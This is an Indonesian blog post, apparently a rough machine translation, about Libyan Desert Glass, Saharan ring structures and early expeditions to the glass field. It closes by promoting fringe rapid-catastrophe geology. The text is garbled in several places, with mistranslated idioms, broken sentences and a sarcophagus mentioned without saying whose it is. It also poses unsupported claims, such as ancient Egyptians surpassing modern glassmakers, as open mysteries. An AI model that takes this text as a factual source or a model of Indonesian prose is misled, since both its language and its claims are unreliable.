Multi Granit -struktur cincin, Gurun Sahara, Libya.

Gurun Libya adalah sebuah gurun kosong dan tidak ada tempat tinggal manusia.Bagian pusat sangat kering, di mana hujan kurang dari sekali dalam tiga puluh tahun. Hal ini sangat kering dan tandus.

NASA memilih gurun ini sebagai basis percobaan operasi untuk proyek pendaratan Viking, karena mereka menganggap lokasi ini  mirip kondisi dengan gurun di Mars. Tidak ada jalan atau trek, hanya kekosongan yang terbuka lebar

Granite multi-ringed structure, Sahara Desert, Libya. Original image credit: NASA/Landsat 7

Pada tahun 1932, British surveyor Patrick Clayton adalah orang Eropa pertama yang menjelajahi daerah di mana perbatasan Mesir, Libya, dan Sudan bertemu. Ketika ia menyeberangi Laut Pasir Besar, ia berlari lebih dari sesuatu yang membuat suara-suara berderak di bawah roda nya. Ternyata tempat yang dilaluinya adalah kaca silika…..

Geological Society of Mesir diundang LJ Spencer, seorang ahli mineral dari British Museum, untuk mengunjungi situs tersebut pada tahun 1934. ekspedisi Nya menghabiskan sembilan hari mengumpulkan gelas.Selama waktu itu, ia menemukan bahwa Areal lahan dari utara-selatan : 130 kilometer dan 53 kilometer dari timur ke barat. Namun, sejak saat itu telah menentukan bahwa kaca dapat ditemukan di dua daerah, salah satunya adalah berbentuk oval, dan cincin yang lain melingkar dengan diameter 21 kilometerAnehnya, pusat lingkaran tidak mengandung kaca…

Permata menghiasi dada sarkofagus nya berisi sepotong besar kaca gurun kehijauan-kuning.Leburan silika adalah kemurnian Perhiasanseperti  glassmakers modern. Namun tidak mampu untuk menciptakan seni itu. Rahasia apa yang di milkiki Mesir kuno sehingga mereka memungkinkan untuk melebihi kemampuan teknisi modern?

Struktur berbentuk cincin dan kubah-seperti lainnya terangkat kepermukaan, dataran angin-menyapu di daerah-daerah yang sangat sulit dapat dicapai.Seperti yang telah ditunjukkan-out di masa lalu, sebagian besar menunjukkan formasi terangkat, digambarkan rims tajam pegunungan pisau bermata, pantat datar, dan saluran liar brachiated berjalan meliputi daerah sekitarnya seperti ribuan sungai besar yang telah berpaling ke debu

Sudah saatnya perspektif lain tentang geologi.Ada beberapa ahli geologi yang mulai mempertanyakan teori gerak lambat yang mendominasi  ilmu saat ini. Karena para ilmuwan planet telah menyaksikan fragmen komet bertabrakan dengan Jupiter, bulu terionisasi luas meletus dari Io, dan petir gunung berapi yang menyembur, tampaknya masuk akal untuk bersikeras bahwa teoriperubahan yang melibatkan kekuatan bertindak cepat dibandingkan bersama dengan orang-orang yang membutuhkan jutaan tahun.

by Stephen Smith dari ide yang diajukan oleh Klaas Geertsma
<keajaibanalam.co.tv>

Previous Older Entries

Daftar Isi

%d blogger menyukai ini: